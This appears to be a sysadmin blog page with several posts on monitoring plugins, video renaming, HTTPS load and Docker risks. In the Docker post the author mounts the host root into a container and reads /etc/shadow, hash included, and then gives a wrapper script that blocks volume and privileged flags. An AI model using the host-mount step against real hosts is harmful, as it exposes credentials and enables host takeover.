Header RSS Feed
 
If you only want to see the articles of a certain category, please click on the desired category below:
ALL Android Backup BSD Database Hacks Hardware Internet Linux Mail MySQL Monitoring Network Personal PHP Proxy Shell Solaris Unix Virtualization VMware Windows Wyse

Encrypted http connections (https) use four times more CPU resources
Thursday - Jan 19th 2017 - by - (0 comments)

Yesterday we finally enabled encrypted HTTP using TLS connections on https://www.nzz.ch, one of the largest newspapers in Switzerland. Besides the "switch" on the load balancers - which was the easy part - there was a lot of work involved between many different teams and external service providers. During the kickoff meeting a few weeks ago I was asked how the load balancers would perform when we enable HTTPS. I knew that the additional encryption of the HTTP traffic will use more CPU (every connection needs to be en- and decrypted), but I couldn't give a accurate number. But what I was sure of: We're not in the 90's anymore and the servers can handle additional load.

Well, yesterday was the big day and as soon as I forced the redirect from http to https, the CPU load went up. The network traffic itself staid the same so the increased CPU usage is caused by the http encryption. But see for yourself:

Encrypted http traffic causes more cpu load 

Based on these graphs it's fair to say that encrypted http traffic uses around 4x more CPU than before.

 

Rename video files to filename with recorded date using mediainfo
Monday - Jan 16th 2017 - by - (0 comments)

In my family we use videos - of course - to document our kids growing up. Compared to our parents in the 80's there isn't just one video camera available, nowadays we have many cams everywhere we look. Especially the cameras on mobile phones are handy to shoot some films. 

The problem with several video sources is however, that each source has its own file naming (let alone the video and audio encoding). I found it especially annoying when I wanted to sort the videos according to their recording date. Android in particular has the problem that you cannot use the "modified date" of the video file to use as recorded date. Example: When you move all your photos and videos from the internal to the external SD card, the modified timestamp changes and therefore they all have the same date.

Luckily video files have meta data containing a lot of information about the used encoding and the recorded date! This information can be retrieved using "mediainfo":

# mediainfo MOV_1259.mp4
General
Complete name                            : MOV_1259.mp4
Format                                   : MPEG-4
Format profile                           : Base Media / Version 2
Codec ID                                 : mp42
File size                                : 53.7 MiB
Duration                                 : 25s 349ms
Overall bit rate                         : 17.8 Mbps
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28

Video
ID                                       : 1
Format                                   : AVC
Format/Info                              : Advanced Video Codec
Format profile                           : High@L4.0
Format settings, CABAC                   : Yes
Format settings, ReFrames                : 1 frame
Format settings, GOP                     : M=1, N=18
Codec ID                                 : avc1
Codec ID/Info                            : Advanced Video Coding
Duration                                 : 25s 349ms
Bit rate                                 : 17.5 Mbps
Width                                    : 1 920 pixels
Height                                   : 1 080 pixels
Display aspect ratio                     : 16:9
Frame rate mode                          : Variable
Frame rate                               : 29.970 fps
Minimum frame rate                       : 29.811 fps
Maximum frame rate                       : 30.161 fps
Color space                              : YUV
Chroma subsampling                       : 4:2:0
Bit depth                                : 8 bits
Scan type                                : Progressive
Bits/(Pixel*Frame)                       : 0.281
Stream size                              : 52.8 MiB (98%)
Title                                    : VideoHandle
Language                                 : English
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28

Audio
ID                                       : 2
Format                                   : AAC
Format/Info                              : Advanced Audio Codec
Format profile                           : LC
Codec ID                                 : 40
Duration                                 : 25s 335ms
Duration_FirstFrame                      : 13ms
Bit rate mode                            : Constant
Bit rate                                 : 156 Kbps
Nominal bit rate                         : 96.0 Kbps
Channel(s)                               : 2 channels
Channel positions                        : Front: L R
Sampling rate                            : 48.0 KHz
Compression mode                         : Lossy
Stream size                              : 483 KiB (1%)
Title                                    : SoundHandle
Language                                 : English
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28
mdhd_Duration                            : 25335

Told you there's a lot of meta information.

What I needed in this case was the line "Encoded date" - the day and time the video was encoded/recorded. Using this information, I am able to rename all the video files.

Simulation first:

# ls | grep "^MOV" | while read line; do targetname=$(mediainfo $line | grep "Encoded date" | sort -u | awk '{print $5"-"$6}'); echo "Old name: $line, new name: ${targetname}.mp4"; done
Old name: MOV_0323.mp4, new name: 2015-03-08-17:24:27.mp4
Old name: MOV_0324.mp4, new name: 2015-03-13-19:12:33.mp4
Old name: MOV_0325.mp4, new name: 2015-03-13-19:18:40.mp4
Old name: MOV_0329.mp4, new name: 2015-03-18-18:41:55.mp4
Old name: MOV_0355.mp4, new name: 2015-03-21-10:05:55.mp4
Old name: MOV_0369.mp4, new name: 2015-03-22-08:38:06.mp4
Old name: MOV_0370.mp4, new name: 2015-03-22-08:38:44.mp4
Old name: MOV_0371.mp4, new name: 2015-03-22-08:39:36.mp4
Old name: MOV_0372.mp4, new name: 2015-03-22-14:05:30.mp4
Old name: MOV_0374.mp4, new name: 2015-03-24-18:31:21.mp4
Old name: MOV_0375.mp4, new name: 2015-03-24-18:31:52.mp4
Old name: MOV_0392.mp4, new name: 2015-03-28-10:54:17.mp4
[...]

And final renaming:

# ls | grep "^MOV" | while read line; do targetname=$(mediainfo $line | grep "Encoded date" | sort -u | awk '{print $5"-"$6}'); echo "Old name: $line, new name: ${targetname}.mp4"; mv $line ${targetname}.mp4; done
Old name: MOV_0323.mp4, new name: 2015-03-08-17:24:27.mp4
Old name: MOV_0324.mp4, new name: 2015-03-13-19:12:33.mp4
Old name: MOV_0325.mp4, new name: 2015-03-13-19:18:40.mp4
Old name: MOV_0329.mp4, new name: 2015-03-18-18:41:55.mp4
Old name: MOV_0355.mp4, new name: 2015-03-21-10:05:55.mp4
Old name: MOV_0369.mp4, new name: 2015-03-22-08:38:06.mp4
Old name: MOV_0370.mp4, new name: 2015-03-22-08:38:44.mp4
Old name: MOV_0371.mp4, new name: 2015-03-22-08:39:36.mp4
Old name: MOV_0372.mp4, new name: 2015-03-22-14:05:30.mp4
Old name: MOV_0374.mp4, new name: 2015-03-24-18:31:21.mp4
Old name: MOV_0375.mp4, new name: 2015-03-24-18:31:52.mp4
Old name: MOV_0392.mp4, new name: 2015-03-28-10:54:17.mp4
[...]

Yes, looks good! With this approach I am now able to unify the file names of all different video sources and can save them according to their recorded (real) date.

 

Simple HTTP check monitoring plugin on Windows (check_http alternative)
Thursday - Jan 5th 2017 - by - (0 comments)

I was looking for a way to run a monitoring plugin, similar to check_http, on a Windows OS. The plugin itself would be executed through NRPE (using NSClient installation) and result the HTTP connectivity from the point of view of this Windows server.

I came across some scripts, including some tcp port checks (worth to mention: Protocol.vbs), some overblown power shell scripts and also a kind of check_tcp fork for Windows. Unfortunately none of them was really doing what I needed. So I built my own little vbscript put together with the information found on the following pages using the MSXML2.ServerXMLHTTP object :

So at the end the script looks like this:

url = "ENTER_FULL_URL_HERE"
Set http = CreateObject("MSXML2.ServerXMLHTTP")
http.open "GET",url,false
http.send
If http.Status = 200 Then
  wscript.echo "HTTP OK - " & url & " returns " & http.Status
  exitCode = 0
ElseIf http.Status > 400 And http.Status < 500 Then
  wscript.echo "HTTP WARNING - " & url & " returns " & http.Status
  exitCode = 1
Else
  wscript.echo "HTTP CRITICAL - " & url & " returns " & http.Status
  exitCode = 2
End If

WScript.Quit(exitCode)

First define the URL in the first line (e.g. https://www.google.com) and then execute the script using cscript (without cscript you get the script's output as a dialog box):

C:\Users\Claudio\Documents>cscript check_http.vbs
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

HTTP OK - https://www.google.com returns 200

Or hitting a page not found error:

C:\Users\Claudio\Documents>cscript check_http.vbs
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

HTTP WARNING - https://www.google.com/this-should-not-exist returns 404

There's still much room to improve the script. It would be very nice to use "url" as an argument added in the command line. Maybe I get to that some time.

Finally in the nsclient.ini the script was defined to be called as nrpe command:

; External scripts
[/settings/external scripts]
allow arguments=true
allow nasty characters=true
[/settings/external scripts/scripts]
check_http_google=scripts\\check_http_google.vbs

 

Creating custom PNP4Nagios templates in Icinga 2 for NRPE checks
Tuesday - Jan 3rd 2017 - by - (0 comments)

Since my early Nagios days (2005), I've used Nagiosgraph as my graphing service of choice. But in the last few years, other technologies came up. PNP4Nagios has became the de facto graphing standard for Nagios and Icinga installations. On big setups with several hundreds of hosts and thousands of services this is a wise choice; PNP4Nagios is a lot faster than Nagiosgraph. But Nagiosgraph can be more easily adapted to create custom graphs using the "map" file. That's why I ran PNP4Nagios and Nagiosgraph in parallel for the last few years on my Icinga 2 installation.

The main reason why I couldn't get rid of Nagiosgraph were performance data which were retrieved by plugins executed through check_nrpe. For example the monitoring plugin check_netio:

$ /usr/lib/nagios/plugins/check_nrpe -H remotehost -c check_netio -a eth0
NETIO OK - eth0: RX=2849414346, TX=1809023474|NET_eth0_RX=2849414346B;;;; NET_eth0_TX=1809023474B;;;;

The plugin reads the RX and TX values from the ifconfig command. As we know, these are counter values; a value which starts from 0 (at boot time) and increases with the number of Bytes passed through that interface.
While a check_disk through NRPE gives correct graphs in PNP4Nagios, the mentioned check_netio didn't:

PNP4Nagios NRPE check_disk graph
PNP4Nagios NRPE check_netio graph FAIL

The first graph on top shows the values from a check_disk plugin. The second graph below represents the values from the check_netio plugin. Both plugins were executed through NRPE on the remote host.

The comparison between the two graphs shows pretty clearly that only unique values (GAUGE in RRD terms; a good example: temperature) are working correctly. The counter values are shown with their increasing value instead of the difference between two values to determine the change.

Where does this come from? Why does PNP4Nagios doesn't reflect these values correctly? The problem can be found in the communication between Icinga 2 and PNP4Nagios.
Each time a host or service is checked in Icinga 2, the perfdata feature writes the performance data log file - by default in /var/spool/icinga2/perfdata. Inside such a log file Icinga 2 shows the following information:

$ cat /var/spool/icinga2/perfdata/service-perfdata*
[...]
DATATYPE::SERVICEPERFDATA    TIMET::1483441246    HOSTNAME::remotehost    SERVICEDESC::Network IO eth0    SERVICEPERFDATA::NET_eth0_RX=2316977534837B;;;; NET_eth0_TX=41612087322B;;;;    SERVICECHECKCOMMAND::nrpe    HOSTSTATE::UP    HOSTSTATETYPE::HARD    SERVICESTATE::OK    SERVICESTATETYPE::HARD
[...]

Take a closer look at the variable SERVICECHECKCOMMAND and you now see that it only contains nrpe - for each remote plugin executed through NRPE, whether this is check_disk, check_netio, check_ntp or whatever.
So Icinga 2 feeds this infromation to poor PNP4Nagios, which of course thinks all the checks are the same (nrpe) and handle all the graphs exactly the same (GAUGE by default). Which explains why the graphs for plugins with COUNTER results fail.

In order to tell PNP4Nagios that we're running different kinds of plugins and values behind NRPE, Icinga 2's PerfdataWriter needs to be adapted a little bit. I edited the default PerfdataWriter object called "perfdata":

$ cat /etc/icinga2/features-enabled/perfdata.conf
object PerfdataWriter "perfdata" {
  service_format_template = "DATATYPE::SERVICEPERFDATA\tTIMET::$icinga.timet$\tHOSTNAME::$host.name$\tSERVICEDESC::$service.name$\tSERVICEPERFDATA::$service.perfdata$\tSERVICECHECKCOMMAND::$service.check_command$$pnp_check_arg1$\tHOSTSTATE::$host.state$\tHOSTSTATETYPE::$host.state_type$\tSERVICESTATE::$service.state$\tSERVICESTATETYPE::$service.state_type$"
  rotation_interval = 15s
}

I only changed the definition of the service_format_template. All other configurable options are still default. And even this is only a minor change, which in short looks like this:

SERVICECHECKCOMMAND::$service.check_command$$pnp_check_arg1$

With that change, Icinga 2's PerfdataWriter is ready. But the variable needs yet to be set within the service object. As I use apply rules on such generic service checks as "Network IO", this was a quick modification in the apply rule of this service:

$ cat /etc/icinga2/zones.d/global-templates/applyrules/networkio.conf
apply Service "Network IO " for (interface in host.vars.interfaces) {
  import "generic-service"

  check_command = "nrpe"
  vars.nrpe_command = "check_netio"
  vars.nrpe_arguments = [ interface ]
  vars.pnp_check_arg1 = "_$nrpe_command$"

  assign where host.address && host.vars.interfaces && host.vars.os == "Linux"
  ignore where host.vars.applyignore.networkio == true
}

In this apply rule, where the "Network IO" service object is assigned to all Linux hosts (host.vars.os == "Linux") with existing interfaces (host.vars.interfaces), I simply added the value for the vars.pnp_check_arg1 variable. Which, in this case, is an underscore followed by the actual command launched by NRPE: "_check_netio".

After a reload of Icinga 2 and a manual check in the performance log file, all things look good. Which means: The SERVICECHECKCOMMAND now contains both nrpe and the remote command (nrpe_check_netio):

$ cat /var/spool/icinga2/perfdata/service-perfdata*
[...]
DATATYPE::SERVICEPERFDATA    TIMET::1483441246    HOSTNAME::remotehost    SERVICEDESC::Network IO eth0    SERVICEPERFDATA::NET_eth0_RX=2316977634837B;;;; NET_eth0_TX=41612088322B;;;;    SERVICECHECKCOMMAND::nrpe_check_netio    HOSTSTATE::UP    HOSTSTATETYPE::HARD    SERVICESTATE::OK    SERVICESTATETYPE::HARD
[...]

Icinga 2 now gives the correct and unique information to PNP4Nagios. But PNP4Nagios still needs to be told what to do. PNP4Nagios parses every line of the performance data it gets from Icinga 2 and checks if there is any template for the found command. Prior to the changes in the PerfdataWriter this was always only "nrpe", so PNP4Nagios used the following file: /etc/pnp4nagios/check_commands/check_nrpe.cfg. This is a standard file which comes with the PNP4Nagios installation.
Now that the command is "nrpe_check_netio", PNP4Nagios checks if there is any command definition called like this. When log level >=2 is activated within PNP4Nagios' perfdata process (set LOG_LEVEL to at least 2 in /etc/pnp4nagios/process_perfdata.cfg), the LOG_FILE (usually /var/log/pnp4nagios/perfdata.log) will show the following information:

$ cat /var/log/pnp4nagios/perfdata.log
[...]
2017-01-03 12:22:55 [15957] [3] DEBUG: RAW Command -> nrpe_check_netio
2017-01-03 12:22:55 [15958] [3]   -- name -> pl
2017-01-03 12:22:55 [15958] [3]   -- rrd_heartbeat -> 8460
2017-01-03 12:22:55 [15957] [2] No Custom Template found for nrpe_check_netio (/etc/pnp4nagios/check_commands/nrpe_check_netio.cfg)
[...]

PNP4Nagios now correctly understood that this is performance data for the command "nrpe_check_netio". And now we can create this config file and tell PNP4Nagios to create DERIVE graphs. DERIVE is another kind of COUNTER data type with the difference that DERIVE values can be resetted to 0, which is the case for the values in ifconfig.

$ cat /etc/pnp4nagios/check_commands/nrpe_check_netio.cfg
#
# Adapt the Template if check_command should not be the PNP Template
#
# check_command check_nrpe!check_disk!20%!10%
# ________0__________|          |      |  |
# ________1_____________________|      |  |
# ________2____________________________|  |
# ________3_______________________________|
#
CUSTOM_TEMPLATE = 1
#
# Change the RRD Datatype based on the check_command Name.
# Defaults to GAUGE.
#
# Adjust the whole RRD Database
DATATYPE = DERIVE
#
# Adjust every single DS by using a List of Datatypes.
DATATYPE = DERIVE,DERIVE

# Use the MIN value for newly created RRD Databases.
# This value defaults to 0
# USE_MIN_ON_CREATE = 1
#
# Use the MAX value for newly created RRD Databases.
# This value defaults to 0
# USE_MAX_ON_CREATE = 1

# Use a single RRD Database per Service
# This Option is only used while creating new RRD Databases
#
#RRD_STORAGE_TYPE = SINGLE
#
# Use multiple RRD Databases per Service
# One RRD Database per Datasource.
# RRD_STORAGE_TYPE = MULTIPLE
#
RRD_STORAGE_TYPE = MULTIPLE

# RRD Heartbeat in seconds
# This Option is only used while creating new RRD Databases
# Existing RRDs can be changed by "rrdtool tune"
# More on http://oss.oetiker.ch/rrdtool/doc/rrdtune.en.html
#
# This value defaults to 8640
# RRD_HEARTBEAT = 305


After a new check of a Network IO service, the xml file of that particular service was re-created with the following information:

# cat /var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<NAGIOS>
  <DATASOURCE>
    <TEMPLATE>nrpe_check_netio</TEMPLATE>
    <RRDFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0_NET_eth0_RX.rrd</RRDFILE>
    <RRD_STORAGE_TYPE>MULTIPLE</RRD_STORAGE_TYPE>
    <RRD_HEARTBEAT>8460</RRD_HEARTBEAT>
    <IS_MULTI>0</IS_MULTI>
    <DS>1</DS>
    <NAME>NET_eth0_RX</NAME>
    <LABEL>NET_eth0_RX</LABEL>
    <UNIT>B</UNIT>
    <ACT>1462883655</ACT>
    <WARN></WARN>
    <WARN_MIN></WARN_MIN>
    <WARN_MAX></WARN_MAX>
    <WARN_RANGE_TYPE></WARN_RANGE_TYPE>
    <CRIT></CRIT>
    <CRIT_MIN></CRIT_MIN>
    <CRIT_MAX></CRIT_MAX>
    <CRIT_RANGE_TYPE></CRIT_RANGE_TYPE>
    <MIN></MIN>
    <MAX></MAX>
  </DATASOURCE>
  <DATASOURCE>
    <TEMPLATE>nrpe_check_netio</TEMPLATE>
    <RRDFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0_NET_eth0_TX.rrd</RRDFILE>
    <RRD_STORAGE_TYPE>MULTIPLE</RRD_STORAGE_TYPE>
    <RRD_HEARTBEAT>8460</RRD_HEARTBEAT>
    <IS_MULTI>0</IS_MULTI>
    <DS>1</DS>
    <NAME>NET_eth0_TX</NAME>
    <LABEL>NET_eth0_TX</LABEL>
    <UNIT>B</UNIT>
    <ACT>1567726688</ACT>
    <WARN></WARN>
    <WARN_MIN></WARN_MIN>
    <WARN_MAX></WARN_MAX>
    <WARN_RANGE_TYPE></WARN_RANGE_TYPE>
    <CRIT></CRIT>
    <CRIT_MIN></CRIT_MIN>
    <CRIT_MAX></CRIT_MAX>
    <CRIT_RANGE_TYPE></CRIT_RANGE_TYPE>
    <MIN></MIN>
    <MAX></MAX>
  </DATASOURCE>
  <RRD>
    <RC>0</RC>
    <TXT>successful updated</TXT>
  </RRD>
  <NAGIOS_AUTH_HOSTNAME>remotehost</NAGIOS_AUTH_HOSTNAME>
  <NAGIOS_AUTH_SERVICEDESC>Network IO eth0</NAGIOS_AUTH_SERVICEDESC>
  <NAGIOS_CHECK_COMMAND>nrpe_check_netio</NAGIOS_CHECK_COMMAND>
  <NAGIOS_DATATYPE>SERVICEPERFDATA</NAGIOS_DATATYPE>
  <NAGIOS_DISP_HOSTNAME>remotehost</NAGIOS_DISP_HOSTNAME>
  <NAGIOS_DISP_SERVICEDESC>Network IO eth0</NAGIOS_DISP_SERVICEDESC>
  <NAGIOS_HOSTNAME>remotehost</NAGIOS_HOSTNAME>
  <NAGIOS_HOSTSTATE>UP</NAGIOS_HOSTSTATE>
  <NAGIOS_HOSTSTATETYPE>HARD</NAGIOS_HOSTSTATETYPE>
  <NAGIOS_MULTI_PARENT></NAGIOS_MULTI_PARENT>
  <NAGIOS_PERFDATA>NET_eth0_RX=1462883655B;;;; NET_eth0_TX=1567726688B;;;; </NAGIOS_PERFDATA>
  <NAGIOS_RRDFILE></NAGIOS_RRDFILE>
  <NAGIOS_SERVICECHECKCOMMAND>nrpe_check_netio</NAGIOS_SERVICECHECKCOMMAND>
  <NAGIOS_SERVICEDESC>Network_IO_eth0</NAGIOS_SERVICEDESC>
  <NAGIOS_SERVICEPERFDATA>NET_eth0_RX=1462883655B;;;; NET_eth0_TX=1567726688B;;;;</NAGIOS_SERVICEPERFDATA>
  <NAGIOS_SERVICESTATE>OK</NAGIOS_SERVICESTATE>
  <NAGIOS_SERVICESTATETYPE>HARD</NAGIOS_SERVICESTATETYPE>
  <NAGIOS_TIMET>1483442747</NAGIOS_TIMET>
  <NAGIOS_XMLFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0.xml</NAGIOS_XMLFILE>
  <XML>
   <VERSION>4</VERSION>
  </XML>
</NAGIOS>

The xml file shows that the nrpe_check_netio  PNP4Nagios template is now used:

<TEMPLATE>nrpe_check_netio</TEMPLATE>

and the service check command is correctly identified as nrpe_check_netio:

<NAGIOS_CHECK_COMMAND>nrpe_check_netio</NAGIOS_CHECK_COMMAND>

Once /etc/pnp4nagios/check_commands/nrpe_check_netio.cfg was created, all the other hosts with this "Network IO" check were adapted and are now showing the correct graphs.

PNP4Nagios NRPE check_netio correct counter graph 

The same procedure can now be created for all kinds of plugins which are executed through NRPE and output counter/derive values, for example check_diskio.

 

check_esxi_hardware and pywbem 0.10.x tested
Wednesday - Dec 21st 2016 - by - (0 comments)

Yesterday a new version (0.10.0) of pywbem was released. Will the monitoring plugin check_esxi_hardware continue to run without a glitch? It should, since the plugin was "made ready" for future releases of pywbem (see New version of check_esxi_hardware supports pywbem 0.9.x).

Let's try check_esxi_hardware with the new pywbem version. I used pip to upgrade pywbem to the latest available version:

 $ sudo pip install --upgrade pywbem
Downloading/unpacking pywbem from https://pypi.python.org/packages/9a/50/839b059c351c4bc22c181c0f6a5817da7ca38cc0ab676c9a76fec373d5f5/pywbem-0.10.0-py2.py3-none-any.whl#md5=1bc01e6fd91f5e7ca64c058f3e0c1254
  Downloading pywbem-0.10.0-py2.py3-none-any.whl (201kB): 201kB downloaded
Requirement already up-to-date: PyYAML in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: six in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: ply in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: M2Crypto>=0.24 in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: typing in /usr/local/lib/python2.7/dist-packages (from M2Crypto>=0.24->pywbem)
Installing collected packages: pywbem
  Found existing installation: pywbem 0.9.0
    Uninstalling pywbem:
      Successfully uninstalled pywbem
Successfully installed pywbem
Cleaning up...

And then launched the plugin:

$ ./check_esxi_hardware.py -H esxiserver -U root -P secret -v
20161221 12:17:44 Connection to https://esxiserver
20161221 12:17:44 Found pywbem version 0.10.0
20161221 12:17:44 Check classe OMC_SMASHFirmwareIdentity
20161221 12:17:45   Element Name = System BIOS
20161221 12:17:45     VersionString = B200M4.3.1.2b.0.042920161158
[...]
20161221 12:17:49 Check classe VMware_SASSATAPort
OK - Server: Cisco Systems Inc UCSB-B200-M4 s/n: XXXXXXXX Chassis S/N: XXXXXXXX  System BIOS: B200M4.3.1.2b.0.042920161158 2016-04-29

As you can see, the new version works without problems. Go ahead and upgrade pywbem.

 

The Docker Dilemma: Benefits and risks going into production with Docker
Friday - Dec 16th 2016 - by - (2 comments)

Over a period of more than one year I've followed the Docker hype. What is it about? And why does it seem do all developers absolutely want to use Docker and not other container technologies? Important note: Although it may seem that I'm a sworn enemy of Docker; I am not! I find all kinds of new technologies interesting, to say at least. But I'm a skeptical, always have been, when it comes to phrases like "this is the ultimate solution to all your problems". So this article is mainly to document the most important points I dealt with in a period of one year, mainly handling risks and misunderstandings and trying to get a solution for them.

When Docker came up the first time as a request (which then turned into a demand), I began my research. And completely understood, what Docker was about. Docker was created to fire up new application instances quickly and therefore allow greater and faster scalability. A good idea, basically, which sounds very interesting and makes sense - as long as your application can run independently. What I mean with that is that:

  • Data is stored elsewhere (not on local file system), for example in an object store or database which is accessed by the network layer
  • There are no hardcoded (internal) IP addresses in the code
  • The application is NOT run as root user, therefore not requiring privileged rights
  • The application is scalable and can run in parallel in several containers

But the first problems already arose. The developer in question (let's call him Dave) wanted to store data in the container. He didn't care if his application ran as root or not (I'm quoting: "At least then I got no permission problems"). And he wanted to access an existing NFS share from within the container.

I told him about Linux Containers and that this would be better solved with the LXC technology. To my big surprise, he didn't even know what LXC was. So not only was the original concept of Docker containers misunderstood, the origins of the project (Docker was originally based on LXC until Docker eventually rewrote the library to libdocker) were not even known. Another reason to use Docker, accoording to this developer: "I can just install any application as a Docker container I want - and I don't even need to know how to configure it." Good lord. It's as if I wanted to build a car myself just because I don't want anyone else to do it. The fact that I have no clue how to build a car, does obviously not matter.

More or less in parallel, another developer from another dev team (let's call him Frank), was also pushing for Docker. He created his code in a Docker environment (which is absolutely fine) using a MongoDB in the background. It's important to understand that using a code library to access a MongoDB and managing a MongoDB is entirely different. So by installing the MongoDB from a Docker image (he had found on the Internet) he had a working MongoDB, yes. But what about the tuning and security settings of MongoDB? This was left as is, because the knowledge of managing MongoDB was not there. As I've been managing MongoDB since 2013, I know where to find it's most important weaknesses and how to tackle them (I wrote about this in an older article "It is 2015 and we still should not use MongoDB (POV of a Systems Engineer)"). If I had let this project go in production as is, the MongoDB would have been available to the whole wide world - without any authentication! So I was able to convince this developer that MongoDB should be run separately, managed separately, and most important: MongoDB stores persistant data. Don't run this as a Docker container.

While I was able to talk some sense into Frank, Dave still didn't see any issues or risks. So I created the following list to have an overview of unnecessary risks and problems:

  • readonly file system (Overlay FS, Layers per app): Means you can temporarily alter files but at the next boot of the container, these changes are gone. You will have to redeploy the full container, even for fixing a typo in a config file. This also means that no security patches can be applied.
  • If you want to save persistant data, an additional mount of a data volume is required. Which adds complexity, dependencies and risks (see details further down in this article).
  • Shutdown/Reboot means data loss, unless you are using data volumes or your application is programmed smart enough to use object stores like S3 (cloud-ready).
  • If you use data volumes mounted from the host, you lose flexibility of the containers, because they're now bound to the host.
  • Docker containers are meant to run one application/process, no additional services and daemons. This makes troubleshooting hard, because direct SSH is not possible, monitoring and backup agents are not running. You can solve this by using a docker image already being prepped up with all the necessary stuff. But when adding all this stuff in the first place, LXC would be a better choice.
  • A crash of the application which crashes the container cannot be analyzed properly, because log files are not saved (unless, again, a separate data volume is used for the logs).
  • Not a full network stack: Docker containers are not "directly attached" to the network. They're connected through the host and connections are going through Network Address Table (NAT) firewall rules. This adds additional complexity for troubleshooting network problems.
  • The containers run as root and install external contents through public registries (Dockerhub for example). Unless this is defined differently by using an internal and private Docker registry, this adds risks. What is installed? Who verified the integrity of the downloaded image/software? This is not me just saying this, it's proven that this is a security problem. See InfoQ article Security vulnerabilities in Docker Hub Images.
  • OverlayFS/ReadOnly FS are less performant.
  • In general troubleshooting a problem will take more time because of additional complexity compared to "classic" systems or Linux containers because of the network stack, additional file system layers, data volume mounts, missing log files and image analysis.
  • Most of these problems can be solved with workarounds. For example by sing your own registry with approved code. Or rewrite your application code to use object stores for file handling. Or create custom base images which contain all your necessary settings and programs/daemons. Or use a central syslog server. But as we all know, workarounds means additional work which means costs.

Even with all these technical points, Dave went on with his "must use Docker for everything" monologue. He was even convinced that he wanted to manage all the servers himself, even database servers. I asked him why he'd want to do that in the first place and his answer was "So I can try a new MySQL version". Let's assume for a moment, that is a good idea and MySQL runs as a Docker container with an additional volume holding /var/lib/mysql. Now Dave deploys a new Docker container with a new MySQL version - being smart and shutting down the old version first. As soon as MySQL starts up, it will start running over the databases found in /var/lib/mysql. And upgrades the tables according to the new version (mainly the tables in the mysql database). And now let's assume after two days a new bug is found in the production app, that the current application code is not fully compatible with the newer MySQL version. You cannot downgrade to the older MySQL version anymore because tables were already altered. I've seen such problems in the past already (see Some notes on a MySQL downgrade 5.1 to 5.0). So I know the problems of downgrading already upgraded data. But obviously my experience and my warnings didn't count and were ignored.
Eventually Dave's team started to build their own hosting environment. I later heard that they had destroyed their ElasticSearch data, because something wrong happened within their Docker environment and the data volume holding the ES data...

Meanwhile I continued my research and created my own test-lab using plain Docker (without any orchestration). I came across several risks. Especially the volume mounts from the host caught my eye. A Docker container is able to mount any path from it's host when the container is started up (docker run). As a simple test, I created a docker container with the following volume information:

docker run ... -v /:/tmp ...

The whole file system of the host was therefore mounted in the container as /tmp. With write permissions. Meaning you can delete your entire host's filesystem, by error or on purpose. You can read and alter the (hashed) passwords from /etc/shadow (in this case by simply accessing /tmp/etc/shadow in the container).

root@5a87a58982f9:/# cat /tmp/etc/shadow | head
root:$6$9JbiWxjT$QKL4M1GiRKwtQrJmgX657XvMW02u8KjOzxSaRRWhFaSJwcpLXLdJZwkD8QEwk0H
IaxzOlf.JtWcwVykXAex2..:17143:0:99999:7:::
daemon:*:17001:0:99999:7::: 
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::
man:*:17001:0:99999:7:::
lp:*:17001:0:99999:7:::
mail:*:17001:0:99999:7:::
news:*:17001:0:99999:7:::
root@5a87a58982f9:/#

Basically by being root in the container with such a volume mount, you take over the host - which is supposed to be the security guard for all containers. A nice article with another practical example can be found here: Using the docker command to root the host (totally not a security issue).

Another risk, less dangerous but still worth to mention it, is the mount of the hosts docker socket (/var/run/docker.sock) into a container. This container is then able to pull information about all containers running on the same host. This information sometimes contains environment variables. Some of these may contain cleartext passwords (e.g. to start up a service to connect to a remote DB with given credentials, see The Dangers of Docker.sock).

In general you can find a lot of articles warning you about exposing the docker socket. Interestingly these articles were mainly written by System Engineers, rarely by developers.  Some of them:

Besides the volumes, another risk is the creation of privileged containers. They basically are allowed to do anything, even when they're already running. This means that within a running container you can create a new mount point and mount the host's file system right into the container. For unprivileged containers this would only work during the creation/start of the container. Privileged containers can do that anytime.

My task, as being responsible for systems and their stability and security, is to prevent volumes and privileged containers in general. Once more: A volume from a point of view of a container is only needed, if persistant data needs to be written on the locoal filesystem. And if you do that, Docker is anyway not the right solution to you. I started looking but to my big surprise there is no way to simply prevent Docker containers to create and mount volumes. So I created the following wrapper script, which acts as main "docker" command:

#!/bin/bash
# Simple Docker wrapper script by www.claudiokuenzler.com

ERROR=0
CMD="$@"

echo "Your command was: $CMD" >> /var/log/dockerwrapper.log

if echo $CMD | grep -e "-v" > /dev/null; then echo "Parameter for volume mounting detected. This is not allowed."; exit 1;fi
if echo $CMD | grep -e "--volume" > /dev/null; then echo "Parameter for volume mounting detected. This is not allowed."; exit 1;fi
if echo $CMD | grep -e "--privileged" > /dev/null; then echo "Parameter for privileged containers detected. This is not allowed."; exit 1;fi

/usr/bin/docker.orig $CMD

While this works on the local Docker host, this does not work when the Docker API is used through the Docker socket. And because in the meantime we decided (together with yet another developer, who understands my concerns and will be in charge for the Docker deployments) to use Rancher as overlying administration interface (which at the end uses Docker socket through a local agent), the wrapper script is not enough. So a prevention should either be configurable in Docker or Rancher; most importantly Docker itself should support security configurations to prevent certain functions or container settings (comparable to disable_functions in PHP).

In my trials to prevent Docker mounting host volumes, I also came across a plugin called docker-novolume-plugin. This plugin prevents creation of data volumes - but unfortunately does not prevent the mounting of the host's filesystem. I opened up a feature request issue on the Github repository but as of today it's not resolved.

Another potential solution could have been a working AppArmor profile of the Docker engine. But a working AppArmor profile is only in place for a running container itself, not for the engine creating and managing containers:

